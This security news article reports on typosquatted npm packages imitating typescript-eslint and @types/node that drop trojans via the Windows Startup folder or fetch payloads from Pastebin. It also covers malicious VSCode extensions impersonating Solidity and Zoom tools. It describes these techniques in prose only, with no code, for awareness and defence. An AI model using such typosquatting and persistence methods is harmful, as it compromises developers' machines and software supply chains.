Malevolent actors have been identified deploying counterfeit npm libraries that mimic legitimate packages such as typescript-eslint
and @types/node
, resulting in thousands of downloads from unsuspecting users on the package registry.
The impostor variants, dubbed @typescript_eslinter/eslint
and types-node
, are meticulously designed to execute trojans and procure subsequent payloads, respectively.
“Although typosquatting attacks are far from novel, the diligence exhibited by these malicious operators in fabricating these libraries as credible is indeed striking,” remarked Ax Sharma from Sonatype in a detailed analysis published on Wednesday.
“Moreover, the inflated download figures for packages like types-node
suggest a combination of genuine developers inadvertently downloading these typosquats and attackers artificially boosting download statistics to enhance the perceived legitimacy of their malicious offerings.”
A Deceptive Facade
Sonatype’s inquiry into the npm listing for @typescript_eslinter/eslint
uncovered a bogus GitHub repository linked to a user named “typescript-eslinter,” created on November 29, 2024. Accompanying this library is a file labeled prettier.bat
.
Another associated package, @typescript_eslinter/prettier
, masquerades as a renowned code formatting tool. However, instead of delivering its purported functionality, it installs the compromised @typescript_eslinter/eslint
library.
The corrupted library is programmed to deposit prettier.bat
into a temporary folder and integrate it into the Windows Startup directory, ensuring it executes automatically upon system reboot.
“Contrary to its .bat
extension, the prettier.bat
file is actually a Windows executable (.exe
) that has been previously flagged on VirusTotal as a trojan and dropper,” Sharma elaborated.
The Multifaceted Threat
The second package, types-node
, is configured to connect with a Pastebin URL to fetch scripts that deploy a malicious executable, deceitfully labeled as npm.exe
.
“This scenario underscores the critical need for fortified supply chain security protocols and heightened scrutiny of third-party software registries,” Sharma emphasized.
Broader Implications in Supply Chain Security
This development coincides with ReversingLabs’ discovery of numerous malicious extensions infiltrating the Visual Studio Code (VSCode) Marketplace in October 2024. A month later, an additional compromised npm package emerged, amassing 399 downloads before being identified and removed.
Malicious VSCode Extensions Identified
The rogue extensions, which have since been purged, include:
- EVM.Blockchain-Toolkit
- VoiceMod.VoiceMod
- ZoomVideoCommunications.Zoom
- ZoomINC.Zoom-Workplace
- Ethereum.SoliditySupport
- ZoomWorkspace.Zoom
- ethereumorg.Solidity-Language-for-Ethereum
- VitalikButerin.Solidity-Ethereum
- SolidityFoundation.Solidity-Ethereum
- EthereumFoundation.Solidity-Language-for-Ethereum
- SOLIDITY.Solidity-Language
- GavinWood.SolidityLang
- EthereumFoundation.Solidity-for-Ethereum-Language
“The campaign initially targeted the cryptocurrency sector, but by late October, the fraudulent extensions began impersonating Zoom applications,” stated Lucija Valentić, a researcher at ReversingLabs. “Each successive extension demonstrated increasing sophistication.”
Hidden Payloads and Developer Caution
These malicious tools incorporated obfuscated JavaScript code, serving as downloaders for second-stage payloads from remote servers. While the exact nature of these payloads remains undetermined, the findings amplify the call for heightened vigilance when sourcing open-source libraries and extensions.
“The capability to integrate plugins and enhance IDE functionality renders these platforms enticing targets for adversaries,” Valentić warned. “Despite their critical role, IDE extensions are frequently underestimated as a security threat, yet their compromise could jeopardize an organization’s entire development lifecycle.”